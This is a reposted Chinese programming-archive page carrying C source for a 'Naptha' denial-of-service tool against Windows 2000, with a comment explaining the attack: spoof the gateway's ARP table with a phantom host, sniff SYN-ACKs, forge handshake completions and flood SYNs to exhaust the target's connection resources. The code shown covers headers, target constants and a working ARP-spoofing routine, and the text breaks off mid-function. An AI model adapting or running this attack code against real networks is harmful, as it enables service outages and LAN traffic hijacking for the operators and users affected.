当前位置：早雪网 → 网络学院 → 编程文档 → 其他语言 → NAPTHA攻击方式在2K下的简单实现

NAPTHA攻击方式在2K下的简单实现

减小字体

增大字体作者：未知来源：supcode.com收集整理发布时间：2005-7-1 14:50:57

NAPTHA攻击方式在2K下的简单实现

/*

  作者：LionD8
  EMAIL：liond8@eyou.com
  出处:https://www.xfocus.net/bbs/index.php?act=SE&f=3&t=33339&p=117598

我的窝:http://liond8.126.com
  2004.2.16 凌晨

  简单原理:
  1.欺骗网关，让网关知道幻影主机的MAC.
  2.嗅探局域网中的所有数据包，判断是不是返回给虚幻主机的
  第2次握手的数据包。如果是，就伪造第3次握手.
  3.发送伪造的SYN报文.

  通过消耗对方的维护连接的资源进行DOS。占用通道等。

  详细原理请见Warning3老大整理的《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
  我就不废话了。
  地址: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721

*/

///////////////////////////////////////////////////
//以下代码在2K VC6.0下编译通过
//在虚拟机上测试，好像2k系统如《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
//所说，不受什么影响.
///////////////////////////////////////////////////

#include "stdio.h"
#include "Packet32.h"
#include "windows.h"
#include <ws2tcpip.h>
#include "winsock2.h"
#include "wchar.h"

#define        EPT_IP            0x0800
#define        EPT_ARP            0x0806
#define        ARP_HARDWARE    0x0001
#define        ARP_REQUEST        0x0001
#define        ARP_REPLY        0x0002

#define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020 //混杂模式

#pragma comment(lib, "packet.lib")
#pragma comment(lib, "ws2_32.lib")

#pragma pack(push, 1)

typedef struct ehhdr
{
    UCHAR    eh_dst[6];
    UCHAR    eh_src[6];
    USHORT   eh_type;
}EHHEADR, *PEHHEADR;

typedef struct arphdr
{
    USHORT    arp_hrd;
    USHORT    arp_pro;
    UCHAR     arp_hln;
    UCHAR     arp_pln;
    USHORT    arp_op;
    UCHAR     arp_sha[6];
    ULONG     arp_spa;
    UCHAR     arp_tha[6];
    ULONG     arp_tpa;
}ARPHEADR, *PARPHEADR;

typedef struct arpPacket
{
    EHHEADR    ehhdr;
    ARPHEADR   arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)

typedef struct ip_head
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IPHEADER;

typedef struct tcp_head
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCPHEADER;

typedef struct tsd_hdr
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSDHEADER;

DWORD  WINAPI  ThreadArpSnoop(LPVOID lp);
USHORT checksum(USHORT *buffer, int size);
DWORD  WINAPI  ThreadSynFlood(LPVOID lp);
DWORD  WINAPI    SnifferSynAck(LPVOID lp);
void    SendAck ( DWORD    SEQ , DWORD    ACK ,USHORT    SPort);
void    AnalyseData    (LPPACKET lpPacket);

#define        ATPORT    80                    //攻击端口
#define        ATIP    "192.168.1.1"        //攻击IP
#define        GATE    "192.168.85.1"        //网关
#define        SNOOPIP    "192.168.85.250"    //幻影主机IP
#define        SLEEPTIME    1000
UCHAR    DMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFF}; //广播
UCHAR    SMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFE}; //幻影主机MAC

BOOL  IsGoOn = TRUE;

void main()
{

    IsGoOn = FALSE;
    CreateThread(NULL,NULL,ThreadArpSnoop,NULL,NULL,NULL);

    while ( !IsGoOn )
        Sleep(1);
    IsGoOn = FALSE;
    CreateThread(NULL,NULL,SnifferSynAck,NULL,NULL,NULL);
    while ( !IsGoOn )
        Sleep(1);
    CreateThread(NULL,NULL,ThreadSynFlood,NULL,NULL,NULL);

    while (1)
    Sleep(1000000);

}

DWORD  WINAPI  ThreadArpSnoop(LPVOID lp)
{
    static CHAR  AdapterList[10][1024];
    TCHAR          szPacketBuf[512];
    LPADAPTER    lpAdapter;
    LPPACKET     lpPacket;
    WCHAR        AdapterName[2048];
    WCHAR        *temp,*temp1;
    ARPPACKET    ARPPacket;
    ULONG         AdapterLength = 1024;
    DWORD         AdapterNum = 0;
    DWORD         nRetCode, i;

    if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
        printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }
    temp = AdapterName;
    temp1=AdapterName;
    i = 0;
    while ((*temp != '\0')||(*(temp-1) != '\0'))
    {
        if (*temp == '\0')
        {
            memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
            temp1=temp+1;
            i++;
        }
        temp++;
    }
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
    wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
    printf("\nPlease select adapter number:");
    scanf("%d",&i);
    if(i>AdapterNum)
    {
        printf("\nInput Number error!");
        return 0;
    }

    IsGoOn = TRUE;
    lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[i-1]);
    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        printf("Unable to open the driver, Error Code : %lx\n", nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf("\nError:failed to allocate the LPPACKET structure.");
        return 0;
    }
    memset(szPacketBuf, 0, sizeof(szPacketBuf));
    memcpy(ARPPacket.ehhdr.eh_dst, DMacAddr, 6);
    memcpy(ARPPacket.ehhdr.eh_src, SMacAddr, 6);
    ARPPacket.ehhdr.eh_type  = htons(EPT_ARP);
    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
    ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(1);
    memcpy(ARPPacket.arphdr.arp_sha, SMacAddr, 6);
    ARPPacket.arphdr.arp_spa = inet_addr(SNOOPIP);
    memset(ARPPacket.arphdr.arp_tha,0,6);
    ARPPacket.arphdr.arp_tpa = inet_addr(GATE);
    memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));
    PacketInitPacket(lpPacket, szPacketBuf, 60);

    if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }
    while ( 1 )
    {
        if(PacketSendPacket(lpAdapter,